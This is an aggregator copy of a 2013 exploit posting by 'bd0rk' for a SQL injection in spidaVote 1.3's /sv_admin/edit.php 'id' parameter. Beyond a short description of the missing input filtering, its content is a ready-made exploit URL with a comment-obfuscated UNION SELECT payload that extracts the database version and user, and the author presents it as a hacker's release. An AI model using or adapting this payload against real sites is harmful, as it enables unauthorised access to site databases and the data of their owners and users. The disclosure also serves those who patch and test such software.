Quantcast
Viewing all articles
Browse latest Browse all 8064

spidaVote 1.3 (id) SQLi Vulnerability


# Exploit-Title: spidaVote 1.3 (id) SQL Injection Vulnerability
# Date: 2013-02-19
# Author: bd0rk
# Software-Link: http://www.spidanet.de/webmaster/download/spidaVote.zip
# Version: 1.3
# Category: web applications
# Google dork: n/a --->script-kiddieprotected
# Tested on: Microsoft Windows Vista

--------------------------------------------------------------------------

Vulnerable code infile /sv_admin/edit.php

Description: The $_GET-Parameter 'id' is not filtered and so an attacker
             can inject some malicious mysql-code.

--------------------------------------------------------------------------


[+]Exploit: http://[target]/[spidaVote_path]/sv_admin/edit.php?id=%27/**+union+/**/select/**/+1,2,3,version(),user(),6/**/--+


Gr33tings, the 24 years old german Hacker bd0rk.

Contact: twitter.com/bd0rk






//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information


Viewing all articles
Browse latest Browse all 8064

Trending Articles